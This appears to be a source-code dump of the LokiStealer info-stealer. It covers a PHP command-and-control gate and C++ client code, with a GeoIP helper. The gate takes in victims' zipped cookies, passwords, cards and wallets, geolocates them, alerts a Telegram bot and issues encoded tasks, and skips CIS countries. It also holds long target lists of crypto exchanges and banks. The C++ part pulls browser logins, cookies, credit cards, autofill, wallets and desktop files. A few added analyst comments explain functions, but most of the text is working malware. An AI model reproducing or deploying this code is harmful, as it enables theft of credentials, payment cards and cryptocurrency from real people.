dechex(self::SHM_KEY)); 94 | } 95 | } 96 | } else { 97 | $this->filehandle = fopen($filename, "rb"); 98 | if (!$this->filehandle) { 99 | throw new Exception("Unable to open file: $filename"); 100 | } 101 | if ($this->flags & self::MEMORY_CACHE) { 102 | $s_array = fstat($this->filehandle); 103 | $this->memoryBuffer = fread($this->filehandle, $s_array['size']); 104 | } 105 | } 106 | $this->setupSegments(); 107 | } 108 | private function loadSharedMemory($filename) { 109 | $fp = fopen($filename, "rb"); 110 | if (!$fp) { 111 | throw new Exception("Unable to open file: $filename"); 112 | } 113 | $s_array = fstat($fp); 114 | $size = $s_array['size']; 115 | if ($shmid = shmop_open(self::SHM_KEY, "w", 0, 0)) { 116 | shmop_delete ($shmid); 117 | shmop_close ($shmid); 118 | } 119 | $shmid = shmop_open(self::SHM_KEY, "c", 0644, $size); 120 | shmop_write($shmid, fread($fp, $size), 0); 121 | shmop_close($shmid); 122 | fclose($fp); 123 | } 124 | private function setupSegments() { 125 | $this->databaseType = self::COUNTRY_EDITION; 126 | $this->recordLength = self::STANDARD_RECORD_LENGTH; 127 | if ($this->flags & self::SHARED_MEMORY) { 128 | $offset = shmop_size($this->shmid) - 3; 129 | for ($i = 0; $i < self::STRUCTURE_INFO_MAX_SIZE; $i++) { 130 | $delim = shmop_read($this->shmid, $offset, 3); 131 | $offset += 3; 132 | if ($delim == (chr(255).chr(255).chr(255))) { 133 | $this->databaseType = ord(shmop_read($this->shmid, $offset, 1)); 134 | $offset++; 135 | if ($this->databaseType === self::REGION_EDITION_REV0) { 136 | $this->databaseSegments = self::STATE_BEGIN_REV0; 137 | } elseif ($this->databaseType === self::REGION_EDITION_REV1) { 138 | $this->databaseSegments = self::STATE_BEGIN_REV1; 139 | } elseif (($this->databaseType === self::CITY_EDITION_REV0) || ($this->databaseType === self::CITY_EDITION_REV1) || ($this->databaseType === self::ORG_EDITION)) { 140 | $this->databaseSegments = 0; 141 | $buf = shmop_read($this->shmid, $offset, self::SEGMENT_RECORD_LENGTH); 142 | for ($j 
= 0; $j < self::SEGMENT_RECORD_LENGTH; $j++) { 143 | $this->databaseSegments += (ord($buf[$j]) << ($j * 8)); 144 | } 145 | if ($this->databaseType === self::ORG_EDITION) { 146 | $this->recordLength = self::ORG_RECORD_LENGTH; 147 | } 148 | } 149 | break; 150 | } else { 151 | $offset -= 4; 152 | } 153 | } 154 | if ($this->databaseType == self::COUNTRY_EDITION) { 155 | $this->databaseSegments = self::COUNTRY_BEGIN; 156 | } 157 | } else { 158 | $filepos = ftell($this->filehandle); 159 | fseek($this->filehandle, -3, SEEK_END); 160 | for ($i = 0; $i < self::STRUCTURE_INFO_MAX_SIZE; $i++) { 161 | $delim = fread($this->filehandle, 3); 162 | if ($delim == (chr(255).chr(255).chr(255))) { 163 | $this->databaseType = ord(fread($this->filehandle,1)); 164 | if ($this->databaseType === self::REGION_EDITION_REV0) { 165 | $this->databaseSegments = self::STATE_BEGIN_REV0; 166 | } elseif($this->databaseType === self::REGION_EDITION_REV1) { 167 | $this->databaseSegments = self::STATE_BEGIN_REV1; 168 | } elseif ($this->databaseType === self::CITY_EDITION_REV0 || $this->databaseType === self::CITY_EDITION_REV1 || $this->databaseType === self::ORG_EDITION) { 169 | $this->databaseSegments = 0; 170 | $buf = fread($this->filehandle, self::SEGMENT_RECORD_LENGTH); 171 | for ($j = 0; $j < self::SEGMENT_RECORD_LENGTH; $j++) { 172 | $this->databaseSegments += (ord($buf[$j]) << ($j * 8)); 173 | } 174 | if ($this->databaseType === self::ORG_EDITION) { 175 | $this->recordLength = self::ORG_RECORD_LENGTH; 176 | } 177 | } 178 | break; 179 | } else { 180 | fseek($this->filehandle, -4, SEEK_CUR); 181 | } 182 | } 183 | if ($this->databaseType === self::COUNTRY_EDITION) { 184 | $this->databaseSegments = self::COUNTRY_BEGIN; 185 | } 186 | fseek($this->filehandle, $filepos, SEEK_SET); 187 | } 188 | } 189 | private function lookupCountryId($addr) { 190 | $ipnum = ip2long($addr); 191 | if ($ipnum === false) { 192 | throw new Exception("Invalid IP address: " . 
var_export($addr, true)); 193 | } 194 | if ($this->databaseType !== self::COUNTRY_EDITION) { 195 | throw new Exception("Invalid database type; lookupCountry*() methods expect Country database."); 196 | } 197 | return $this->seekCountry($ipnum) - self::COUNTRY_BEGIN; 198 | } 199 | function lookupCountryCode($addr) { 200 | return self::$COUNTRY_CODES[$this->lookupCountryId($addr)]; 201 | } 202 | function lookupCountryName($addr) { 203 | return self::$COUNTRY_NAMES[$this->lookupCountryId($addr)]; 204 | } 205 | private function seekCountry($ipnum) { 206 | $offset = 0; 207 | for ($depth = 31; $depth >= 0; --$depth) { 208 | if ($this->flags & self::MEMORY_CACHE) { 209 | $buf = substr($this->memoryBuffer, 2 * $this->recordLength * $offset, 2 * $this->recordLength); 210 | } elseif ($this->flags & self::SHARED_MEMORY) { 211 | $buf = shmop_read ($this->shmid, 2 * $this->recordLength * $offset, 2 * $this->recordLength ); 212 | } else { 213 | if (fseek($this->filehandle, 2 * $this->recordLength * $offset, SEEK_SET) !== 0) { 214 | throw new Exception("fseek failed"); 215 | } 216 | $buf = fread($this->filehandle, 2 * $this->recordLength); 217 | } 218 | $x = array(0,0); 219 | for ($i = 0; $i < 2; ++$i) { 220 | for ($j = 0; $j < $this->recordLength; ++$j) { 221 | $x[$i] += ord($buf[$this->recordLength * $i + $j]) << ($j * 8); 222 | } 223 | } 224 | if ($ipnum & (1 << $depth)) { 225 | if ($x[1] >= $this->databaseSegments) { 226 | return $x[1]; 227 | } 228 | $offset = $x[1]; 229 | } else { 230 | if ($x[0] >= $this->databaseSegments) { 231 | return $x[0]; 232 | } 233 | $offset = $x[0]; 234 | } 235 | } 236 | throw new Exception("Error traversing database - perhaps it is corrupt?"); 237 | } 238 | } 239 | ?> -------------------------------------------------------------------------------- /Panel/gate.php: -------------------------------------------------------------------------------- 1 | open($zipname, ZipArchive::CREATE); 54 | $zip->addFromString('logs.zip', base64_decode($aaaaa)); 55 | 
56 | 57 | $dira = 'logs.zip'; 58 | $dir = $_SERVER['DOCUMENT_ROOT'].'/'.$dira; 59 | 60 | if(move_uploaded_file($tmp,$dir)) 61 | { 62 | 63 | $ip_info = file_get_contents('https://ip.nf/'.$ip.'.json'); 64 | $json = json_decode($ip_info); 65 | 66 | $ip_info_ .= 'IP: '.$json->ip->ip."
"; 67 | $ip_info_ .= 'provider: '.$json->ip->asn."
"; 68 | $ip_info_ .= 'netmask: '.$json->ip->netmask."
"; 69 | $ip_info_ .= 'hostname: '.$json->ip->hostname."
"; 70 | $ip_info_ .= 'city: '.$json->ip->city."
"; 71 | $ip_info_ .= 'country: '.$json->ip->country."
"; 72 | $ip_info_ .= 'country_code: '.$json->ip->country_code."
"; 73 | $date = time(); 74 | 75 | mysqli_query($db,$s); 76 | 77 | 78 | 79 | 80 | if ($res) 81 | { 82 | 83 | 84 | 85 | $ip_info_ = str_replace('
',"\n",$ip_info_); 86 | $ip_info_ = str_replace('','',$ip_info_); 87 | $ip_info_ = str_replace('','',$ip_info_); 88 | 89 | $time = date('h:i:s'); 90 | $info = "э НэД” аŸб€аИбˆб‘аЛ аНаОаВб‹аЙ аЛаОаГ!\n\nт„ЙяИ а”аАаНаНб‹аЕ IP:\n\n $ip_info_"; 91 | $content = array( 92 | 'chat_id' => $chat_id, 93 | 'text' => $info, 94 | 'parse_mode'=>'HTML', 95 | ); 96 | file_get_contents($url."/sendmessage?".http_build_query($content)); 97 | 98 | $url_log = 'https://'.$_SERVER['SERVER_NAME'].'/files/'.$file; 99 | $content = array( 100 | 'chat_id' => $chat_id, 101 | 'document'=>$url_log, 102 | 'parse_mode'=>'HTML', 103 | ); 104 | file_get_contents($url."/sendDocument?".http_build_query($content)); 105 | 106 | } 107 | } 108 | } 109 | $file = $dir; 110 | $hwid = $array['hwid']; 111 | $settings = $pdoConnection->query("SELECT * FROM `settings`")->fetch(); 112 | $currentLog = $pdoConnection->query("SELECT COUNT(*) FROM logs WHERE hwid = '" . $hwid . "'")->fetchColumn(0); 113 | $zip = new ZipArchive; 114 | $res = $zip->open($_SERVER['DOCUMENT_ROOT'].'/'.$dira); 115 | $zip->extractTo("logs/" . $hwid); 116 | 117 | $zip->extractTo("logs/" . $hwid); 118 | $zip->close(); 119 | 120 | if($settings[2]=='on'&&$currentLog>=0||$settings[2]=='off'&&$currentLog==0){ 121 | 122 | if ($res === TRUE) { 123 | $count = $zip->numFiles; 124 | for ($i = 0; $i < $count; $i++) 125 | { 126 | $stat = $zip->statIndex ($i); 127 | if(stripos($stat['name'],".php")!==FALSE||stripos($stat['name'],".htm")!==FALSE||stripos($stat['name'],".asp")!==FALSE){ 128 | deleteTmp($file); 129 | die(); 130 | } 131 | } 132 | $os = strip_tags($_GET['os']); 133 | $cookie = $array['cookies']; 134 | $pswd =$array['passwords']; 135 | $version = '2.0'; 136 | $cc = $array['cc']; 137 | $wallet = strip_tags($_GET['wallet']); 138 | $fileCount = strip_tags($_GET['file']); 139 | $autofill =$array['autofill']; 140 | $userid =1; 141 | $ip = $_SERVER["REMOTE_ADDR"]; 142 | $date = time(); 143 | $geolocationString = "IP : " . $ip . 
"\r\n"; 144 | for ($crashes = 0; $crashes < 5; $crashes++) { 145 | try { 146 | $loc = json_decode(file_get_contents('http://ip-api.com/json/' . $ip), true); 147 | $country = $loc["country"]; 148 | $countryCode = $loc['countryCode']; 149 | $geolocationString = $geolocationString . "Country Code : " . $loc['countryCode'] . "\r\n"; 150 | $geolocationString = $geolocationString . "Country : " . $loc['country'] . "\r\n"; 151 | $geolocationString = $geolocationString . "State Name : " . $loc['regionName'] . "\r\n"; 152 | $geolocationString = $geolocationString . "City : " . $loc['city'] . "\r\n"; 153 | $geolocationString = $geolocationString . "Timezone : " . $loc['timezone'] . "\r\n"; 154 | $geolocationString = $geolocationString . "ZIP : " . $loc['zip'] . "\r\n"; 155 | $geolocationString = $geolocationString . "ISP : " . $loc['isp'] . "\r\n"; 156 | $geolocationString = $geolocationString . "Coordinates : " . $loc['lat'] . " , " . $loc['lon'] . "\r\n\r\n"; 157 | break; 158 | } 159 | catch(Exception $e) { 160 | $country = "ERROR"; 161 | } 162 | } 163 | if($country == "ERROR"){ 164 | require_once("assets/GeoIP/geoip.php"); 165 | $country = ip_name($ip); 166 | $countryCode= ip_code($ip); 167 | $geolocationString = $geolocationString . "Country Code : " . $countryCode . "\r\n"; 168 | $geolocationString = $geolocationString . "Country : " . $country . "\r\n"; 169 | } 170 | mkdir("logs/" . $hwid, 0777); 171 | if($settings[1]=="off"){ 172 | if($countryCode=="RU"||$countryCode=="KZ"||$countryCode=="UA"||$countryCode=="BY"){ 173 | if(!file_exists("logs/cislogs")){ 174 | mkdir("logs/cislogs",0777); 175 | } 176 | mkdir("logs/cislogs/" . $hwid, 0777); 177 | 178 | die(); 179 | } 180 | } 181 | $zip->extractTo("logs/" . $hwid); 182 | file_put_contents("logs/" . $hwid . "/" . 
".htaccess","php_flag engine 0 183 | RemoveHandler .phtml .php .php2 .php3 .php4 .php5 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html 184 | AddType text/plain .phtml .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html"); 185 | $comment = $zip->getArchiveComment(); 186 | $zip->close(); 187 | $fd = fopen("logs/" . $hwid . "/" . "information.log", 'w'); 188 | fwrite($fd, $comment); 189 | fclose($fd); 190 | $n = 2; 191 | 192 | $info = "logs/" . $hwid . "/" . "information.log"; 193 | $f = file($info); 194 | array_splice($f, $n, 0, $geolocationString); 195 | file_put_contents($info, $f); 196 | 197 | $crypto = array('freewallet.org', 'paxful.com', 'capdax.com', 'wazirx.com', 'okex.com', 'bitfinex.com', 'hitbtc.com', 'kraken.com', 'gateio.io', 'bitstamp.net', 'bittrex.com', 'exmo', 'yobit', 'poloniex.com', 'bitflyer.jp', 'livecoin.net', 'wex.nz', 'cryptonator', 'mercatox.com', 'localbitcoins.com', 'localbitcoins.net', 'luno.', 'coinpayments', 'therocktrading.com', 'etherdelta.com', 'anxpro.com', 'c-cex.com', 'gatecoin.com', 'kiwi-coin.com', 'jubi.com', 'koineks.com', 'ecoin.cc', 'koinim.com', 'litebit.eu', 'lykke.com', 'mangr.com', 'localtrade.pro', 'lbank.info', 'leoxchange.com', 'liqui.io', 'kuna.io', 'fybse.se', 'freiexchange.com', 'fybsg.com', 'gatehub.net', 'getbtc.org', 'gemini.com', 'gdax.com', 'foxbit.com.br', 'foxbit.exchange', 'flowbtc.com.br', 'exx.com', 'exrates.me', 'excambriorex.com', 'ezbtc.ca', 'fargobase.com', 'fisco.co.uk', 'glidera.io', 'indacoin.com', 'ethexindia.com', 'indx.ru', 'infinitycoin.exchange', 'idex.su', 'idex.market', 'ice3x.com', 'ice3x.co.za', 'guldentrader.com', 'exchange.guldentrader.com', 'heatwallet.com', 'hypex.nl', 'negociecoins.com.br', 'topbtc.com', 'tidex.com', 'tidebit.com', 'tradesatoshi.com', 'urdubit.com', 'tuxexchange.com', 'tdax.com', 'spacebtc.com', 'surbitcoin.com', 'surbtc.com', 'usd-x.com', 'xbtce.com', 'yunbi.com', 'zyado.com', 'trade.z.com', 
'zaif.jp', 'wavesplatform.com', 'walltime.info', 'vbtc.exchange', 'vaultoro.com', 'vircurex.com', 'virtacoinworld.com', 'vwlpro.com', 'nlexch.com', 'nevbit.com', 'nocks.com', 'novaexchange.com', 'nxtplatform.org', 'neraex.pro', 'mixcoins.com', 'mr-ripple.com', 'dsx.uk', 'nzbcx.com', 'okcoin.com', 'quadrigacx.com', 'quoinex.com', 'rightbtc.com', 'ripplefox.com', 'rippex.net', 'openledger.info', 'paymium.com', 'paribu.com', 'mercadobitcoin.com.br', 'dcexe.com', 'bitmex.com', 'bitmaszyna.pl', 'bitonic.nl', 'bitpanda.com', 'bitsblockchain.net', 'bitmarket.net', 'bitlish.com', 'bitfex.trade', 'bitexbook.com', 'bitex.la', 'bitflip.cc', 'bitgrail.com', 'bitkan.com', 'bitinka.com', 'bitholic.com', 'bitsane.com', 'changer.com', 'bitshares.org', 'btcmarkets.net', 'braziliex.com', 'btc-trade.com.ua', 'btc-alpha.com', 'bl3p.eu', 'bitssa.com', 'bitspark.io', 'bitso.com', 'bitstar.com', 'ittylicious.com', 'altcointrader.co.za', 'arenabitcoin', 'allcoin.com', 'abucoins.com', 'aidosmarket.com', 'aex.com', 'acx.com', 'bancor.network', 'bitbay.net', 'indodax.com', 'bitcointrade.com.br', 'bitcointoyou.com', 'bitbanktrade.jp', 'bitbank.com', 'big.one', 'bcex.ru', 'bitconnect.co', 'bisq.network', 'bit2c.co.il', 'bit-z.com', 'btcbear.com', 'btcbox.in', 'counterwallet.io', 'freewallet.io', 'indiesquare.me', 'rarepepewallet.com', 'coss.io', 'coolcoin.com', 'crex24.com', 'cryptex.net', 'coinut.com', 'coinsbank.com', 'coinsecure.in', 'coinsquare.com', 'coinsquare.io', 'coinspot.io', 'coinmarketcap.com', 'crypto-bridge.org', 'dcex.com', 'dabtc.com', 'decentrex.com', 'deribit.com', 'dgtmarket.com', 'cryptomkt.com', 'cryptoderivatives.market', 'cryptodao.com', 'cryptomate.co.uk', 'cryptox.pl', 'cryptopia.co.nz', 'coinroom.com', 'coinrate.net', 'chbtc.com', 'chilebit.net', 'coinbase.com', 'burst-coin.org', 'poloniex.com', 'btcc.', 'binance', 'btcc.net', 'btc-trade.com.ua', 'btctrade.im', 'btcturk.com', 'btcxindia.com', 'coincheck.com', 'coinmate.io', 'coingi.com', 'coinnest.co.kr', 
'coinrail.co.kr', 'coinpit.io', 'coingather.com', 'coinfloor.co.uk', 'coinegg.com', 'coincorner.com', 'coinexchange.io', 'coinfalcon.com', 'digatrade.com', 'btc-alpha.com', 'blockchain', 'minergate', 'myetherwallet.com', 'litevault.net', 'dogechain.info', 'coinome', 'bitbns', 'btc.top', 'etherdelta.com', 'btcbank.com.ua', 'coindelta.com', 'depotwallet.com', 'kryptex.org'); 198 | $game = array('steam', 'origin', 'ubi'); 199 | $money = array('paypal', 'chase.com', 'TD', 'wells', 'capitalone', 'skrill', 'PayU'); 200 | $shop = array('amazon', 'ebay', 'walmart', 'newegg', 'apple', 'bestbuy'); 201 | 202 | $cookies = "logs/" . $hwid . "/" . "passwords.log"; 203 | $taskListXOR = ""; 204 | $pdoConnection->exec("INSERT INTO `logs`(`id`, `userID`,`hwid`, `system`, `ip`, `country`, `date`, `count`, `cookie`, `pswd`, `buildversion`, `credit`, `autofill`, `wallets`, `comment`, `checked`) VALUES (null, '$userid','$hwid','$os','$ip','$country','$date', '$fileCount', '$cookie', '$pswd', '$version', '$cc', '$autofill', '$wallet','','0')"); 205 | $tasks = $pdoConnection->query("SELECT * FROM `tasks` ORDER BY `id` LIMIT 10"); 206 | while ($task = $tasks->fetch(PDO::FETCH_ASSOC)) { 207 | if ($task["count"] == 0) { 208 | $taskID = $task["id"]; 209 | $typePreset = $task['preset']; 210 | if(checkTaskParams($hwid,$pswd,$cookie,$wallet,$cc,$task['params'])) continue; 211 | if($typePreset!=="all"){ 212 | $b=0; 213 | $presetsArray = $pdoConnection->query("SELECT id,color,pattern,name FROM `presets` WHERE name='$typePreset'")->fetch(); 214 | $siteFinded = explode(";",$presetsArray['pattern']); 215 | foreach($siteFinded as $key){ 216 | if(file_exists("logs/" . $hwid . "/" . "passwords.log")) if (strripos(file_get_contents("logs/" . $hwid . "/" . "passwords.log"), $key)!==false) $b++; 217 | if(file_exists("logs/" . $hwid . "/" . "cookieDomains.log")) if (strripos(file_get_contents("logs/" . $hwid . "/" . 
"cookieDomains.log"), $key)!==false) $b++; 218 | } 219 | if($b==0) continue; 220 | } 221 | if ($task["country"] == "*") { 222 | $taskListXOR .= $task["task"]."~;~"; 223 | } else { 224 | $countries = explode(",", $task["country"]); 225 | 226 | foreach ($countries as $_country) { 227 | if ($_country == $loc['countryCode']) { 228 | $taskListXOR .=$task["task"]."~;~"; 229 | } 230 | } 231 | } 232 | } else if ($task["count"] > $task["status"]) { 233 | $taskID = $task["id"]; 234 | $typePreset = $task['preset']; 235 | if(checkTaskParams($hwid,$pswd,$cookie,$wallet,$cc,$task['params'])) continue; 236 | if($typePreset!=="all"){ 237 | $b=0; 238 | $presetsArray = $pdoConnection->query("SELECT id,color,pattern,name FROM `presets` WHERE name='$typePreset'")->fetch(); 239 | $siteFinded = explode("~;~",$presetsArray['pattern']); 240 | foreach($siteFinded as $key){ 241 | if(file_exists("logs/" . $hwid . "/" . "passwords.log")) if (strripos(file_get_contents("logs/" . $hwid . "/" . "passwords.log"), $key)!==false) $b++; 242 | if(file_exists("logs/" . $hwid . "/" . "cookieDomains.log")) if (strripos(file_get_contents("logs/" . $hwid . "/" . 
"cookieDomains.log"), $key)!==false) $b++; 243 | } 244 | if($b==0) continue; 245 | } 246 | if ($task["country"] == "*") { 247 | $pdoConnection->exec("UPDATE `tasks` SET `status`=`status` + 1 WHERE `id`='$taskID'"); 248 | 249 | $taskListXOR .=$task["task"]."~;~"; 250 | } else { 251 | $countries = explode(",", $task["country"]); 252 | foreach ($countries as $_country) { 253 | if ($_country == $loc['countryCode']) { 254 | $pdoConnection->exec("UPDATE `tasks` SET `status`=`status` + 1 WHERE `id`='$taskID'"); 255 | 256 | $taskListXOR .=$task["task"]."~;~"; 257 | } 258 | } 259 | } 260 | } 261 | 262 | } 263 | echo myxor($taskListXOR,$xorKey); 264 | } else { 265 | deleteTmp($file); 266 | die(); 267 | } 268 | } 269 | deleteTmp($file); 270 | function deleteTmp($file){ 271 | if(file_exists($file)) unlink($file); 272 | if(file_exists('tmp/'.$_SERVER['REMOTE_ADDR'])) unlink('tmp/'.$_SERVER['REMOTE_ADDR']); 273 | } 274 | function checkTaskParams($hwid,$pswd,$cookie,$wallet,$cc,$params){ 275 | $paramArray = explode(';',$params); 276 | $pass = $paramArray[0]; 277 | $cookies=$paramArray[1]; 278 | $wallets=$paramArray[2]; 279 | $jabb=$paramArray[3]; 280 | $tg=$paramArray[4]; 281 | $ccParam=$paramArray[5]; 282 | if($pass=="on"){ 283 | if ($pswd==0) return true; 284 | } 285 | if($cookies=="on"){ 286 | if ($cookie==0) return true; 287 | } 288 | if($wallets=="on"){ 289 | if ($wallet==0) return true; 290 | } 291 | if($jabb=="on"){ 292 | $fname = "logs/" . $hwid . "/jabber"; 293 | if (!file_exists($fname)) return true; 294 | } 295 | if($tg=="on"){ 296 | $fname = "logs/" . $hwid . "/Telegram"; 297 | if (!file_exists($fname)) return true; 298 | } 299 | if($ccParam=="on"){ 300 | if ($cc==0) return true; 301 | } 302 | return false; 303 | } 304 | 305 | function contains($string, Array $search, $caseInsensitive = false) 306 | { 307 | $exp = '/' 308 | . implode('|', array_map('preg_quote', $search)) 309 | . ($caseInsensitive ? '/i' : '/'); 310 | return preg_match($exp, $string) ? 
true : false; 311 | } 312 | 313 | function formatString($param) 314 | { 315 | $returnString = $param; 316 | $returnString = trim($returnString); 317 | $returnString = stripslashes($returnString); 318 | $returnString = htmlspecialchars($returnString); 319 | 320 | return $returnString; 321 | } 322 | function myxor($text, $key){ 323 | $outText=''; 324 | for($i=0;$i -------------------------------------------------------------------------------- /Source/LokiStealer/Source.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "telegram.h" 6 | #include "sqlite3.h" 7 | #include "export.h" 8 | #include "search.h" 9 | #include "vector.h" 10 | #include "parson.h" 11 | #include "parse.h" 12 | #include "crypt.h" 13 | #include "cred.h" 14 | #include "fncs.h" 15 | #include "mem.h" 16 | #include "cnc.h" 17 | #include "zip.h" 18 | #include "ldr.h" 19 | 20 | void enumCookies(HZIP hZip, SIZE_T* count) { 21 | vector v; 22 | vector_init(&v); 23 | LPCWSTR appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 24 | searchImpl(appdata, &v, CRC32_STR(L"Cookies")); 25 | _free((void*)appdata); 26 | 27 | for (int i = 0; i < vector_count(&v); i++) { 28 | WCHAR* wc = (WCHAR*)vector_get(&v, i); 29 | 30 | int prefix_len = 0; 31 | int encrypted_cols_index_list[1] = { 7 }; 32 | const char* prefix[] = { 0, "\t", "\t", "\t", "\t", "\t", "\t" }; 33 | 34 | for (int i = 0; i < _countof(prefix); i++) { 35 | prefix_len += lstrlenA(prefix[i]); 36 | } 37 | 38 | LPCSTR query = "SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies"; 39 | vector sqlite_v = sqliteProcessFunction(wc, count, query, "\r\n", /*\R\N*/0, 7, 40 | encrypted_cols_index_list, (char**)prefix, 1); 41 | 42 | SIZE_T s = 0; 43 | CHAR* c = 0; 44 | vec_get_str(sqlite_v, &c, &s, prefix_len); 45 | 46 | if (c) { 47 | SIZE_T tc; 48 | randomInt(&tc, 100, 999); 49 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 
50 | wnsprintfW(name, MAX_PATH, L"cookies.txt", tc); 51 | ZipAdd((HZIP)hZip, name, c, s); 52 | _free(name); 53 | 54 | _free(c); 55 | vector_free(&sqlite_v); 56 | } 57 | _free(wc); 58 | 59 | } 60 | vector_free(&v); 61 | } 62 | 63 | void enumPasswords(HZIP hZip, SIZE_T* count) { 64 | vector v; 65 | vector_init(&v); 66 | LPCWSTR appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 67 | searchImpl(appdata, &v, CRC32_STR(L"Login Data")); 68 | _free((void*)appdata); 69 | 70 | for (int i = 0; i < vector_count(&v); i++) { 71 | WCHAR* wc = (WCHAR*)vector_get(&v, i); 72 | 73 | int prefix_len = 0; 74 | int encrypted_cols_index_list[1] = { 3 }; 75 | const char* prefix[] = { "Url: ", "Username: ", "Password: " }; 76 | 77 | for (int i = 0; i < _countof(prefix); i++) { 78 | prefix_len += lstrlenA(prefix[i]); 79 | } 80 | 81 | LPCSTR query = "SELECT signon_realm, username_value, password_value FROM logins"; 82 | vector sqlite_v = sqliteProcessFunction(wc, count, query, "\r\n", /*\R\N*/1, 3, 83 | encrypted_cols_index_list, (char**)prefix, 1); 84 | 85 | SIZE_T s = 0; 86 | CHAR* c = 0; 87 | vec_get_str(sqlite_v, &c, &s, prefix_len); 88 | if (c) { 89 | SIZE_T tc; 90 | randomInt(&tc, 100, 999); 91 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 92 | wnsprintfW(name, MAX_PATH, L"passwords.log", tc); 93 | ZipAdd((HZIP)hZip, name, c, s); 94 | _free(name); 95 | 96 | _free(c); 97 | vector_free(&sqlite_v); 98 | } 99 | _free(wc); 100 | } 101 | vector_free(&v); 102 | } 103 | 104 | void enumInternetexplorer(HZIP hZip, SIZE_T* count) { 105 | vector v; 106 | vector_init(&v); 107 | enumCredentials(&v, count); 108 | 109 | SIZE_T s = 0; 110 | CHAR* c = 0; 111 | vec_get_str(v, &c, &s, 1); 112 | 113 | if (c) { 114 | SIZE_T tc; 115 | randomInt(&tc, 100, 999); 116 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 117 | wnsprintfW(name, MAX_PATH, L"passwords.log", tc); 118 | ZipAdd((HZIP)hZip, name, c, s); 119 | 120 | _free(name); 121 | } 122 | _free(c); 123 | vector_free(&v); 124 | } 125 | 
126 | /* Analyst note (enumCreditcards): targets entries named "Web Data" under %LOCALAPPDATA% and reads card_number_encrypted, expiration_month, expiration_year, name_on_card and origin from the credit_cards table; the output is stored in the archive as CreditCards.txt. The search and decryption helpers are defined in other files. */ void enumCreditcards(HZIP hZip, SIZE_T* count) { 127 | vector v; 128 | vector_init(&v); 129 | LPCWSTR appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 130 | searchImpl(appdata, &v, CRC32_STR(L"Web Data")); 131 | _free((void*)appdata); 132 | 133 | for (int i = 0; i < vector_count(&v); i++) { 134 | WCHAR* wc = (WCHAR*)vector_get(&v, i); 135 | 136 | int prefix_len = 0; 137 | int encrypted_cols_index_list[1] = { 1 }; 138 | const char* prefix[] = { "Number: ", "Mounth: ", "Year: ", "Name: ", "Web Site: " }; 139 | 140 | for (int i = 0; i < _countof(prefix); i++) { 141 | prefix_len += lstrlenA(prefix[i]); 142 | } 143 | 144 | LPCSTR query = "SELECT card_number_encrypted, expiration_month, expiration_year, name_on_card, origin FROM credit_cards"; 145 | vector sqlite_v = sqliteProcessFunction(wc, count, query, "\r\n", /*\R\N*/1, 5, 146 | encrypted_cols_index_list, (char**)prefix, 1); 147 | 148 | SIZE_T s = 0; 149 | CHAR* c = 0; 150 | vec_get_str(sqlite_v, &c, &s, prefix_len); 151 | 152 | if (c) { 153 | SIZE_T tc; 154 | randomInt(&tc, 100, 999); 155 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 156 | wnsprintfW(name, MAX_PATH, L"CreditCards.txt", tc); 157 | ZipAdd((HZIP)hZip, name, c, s); 158 | _free(name); 159 | 160 | _free(c); 161 | vector_free(&sqlite_v); 162 | } 163 | _free(wc); 164 | } 165 | vector_free(&v); 166 | } 167 | 168 | /* Analyst note (enumAutofill): second pass over the same "Web Data" entries, reading name and value from the autofill table with no encrypted-column list; the output is stored in the archive as Autofill.txt. */ void enumAutofill(HZIP hZip, SIZE_T* count) { 169 | vector v; 170 | vector_init(&v); 171 | LPCWSTR appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 172 | searchImpl(appdata, &v, CRC32_STR(L"Web Data")); 173 | _free((void*)appdata); 174 | 175 | for (int i = 0; i < vector_count(&v); i++) { 176 | WCHAR* wc = (WCHAR*)vector_get(&v, i); 177 | 178 | int prefix_len = 0; 179 | const char* prefix[] = { "Id: ", "Value: " }; 180 | 181 | for (int i = 0; i < _countof(prefix); i++) { 182 | prefix_len += lstrlenA(prefix[i]); 183 | } 184 | 185 | LPCSTR query = "SELECT name, value FROM autofill"; 186 | vector sqlite_v = sqliteProcessFunction(wc, 
count, query, "\r\n", /*\R\N*/TRUE, 2, 0, (char**)prefix, 0); 187 | 188 | SIZE_T s = 0; 189 | CHAR* c = 0; 190 | vec_get_str(sqlite_v, &c, &s, prefix_len); 191 | 192 | if (c) { 193 | SIZE_T tc; 194 | randomInt(&tc, 100, 999); 195 | WCHAR* name = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 196 | wnsprintfW(name, MAX_PATH, L"Autofill.txt", tc); 197 | ZipAdd((HZIP)hZip, name, c, s); 198 | _free(name); 199 | 200 | _free(c); 201 | vector_free(&sqlite_v); 202 | } 203 | _free(wc); 204 | } 205 | vector_free(&v); 206 | } 207 | 208 | /* Analyst note (enumCrypto): hands parserImpl() the name list wallet, bitcoin, bither with %APPDATA% as the root and "Crypto" as the archive folder; the matching rules live in parserImpl(), which is not shown here. */ void enumCrypto(HZIP hZip, SIZE_T* count) { 209 | LPCWSTR appdata = resolveEnvrimoment(L"APPDATA"); 210 | LPCWSTR list[] = { L"wallet", L"bitcoin", L"bither" }; 211 | parserImpl(list, count, 3, L"Crypto", TRUE, (HZIP)hZip, appdata); 212 | _free((void*)appdata); 213 | } 214 | 215 | /* Analyst note (enumUserprofile): collects from %USERPROFILE%\Desktop using the list .txt and .doc, with "Files" as the archive folder. */ void enumUserprofile(HZIP hZip, SIZE_T* count) { 216 | LPCWSTR userprofile = resolveEnvrimoment(L"USERPROFILE"); 217 | lstrcatW((WCHAR*)userprofile, L"\\Desktop"); 218 | 219 | LPCWSTR list[] = { L".txt", L".doc" }; 220 | parserImpl(list, count, 2, L"Files", TRUE, (HZIP)hZip, userprofile, TRUE); 221 | _free((void*)userprofile); 222 | } 223 | 224 | /* Analyst note 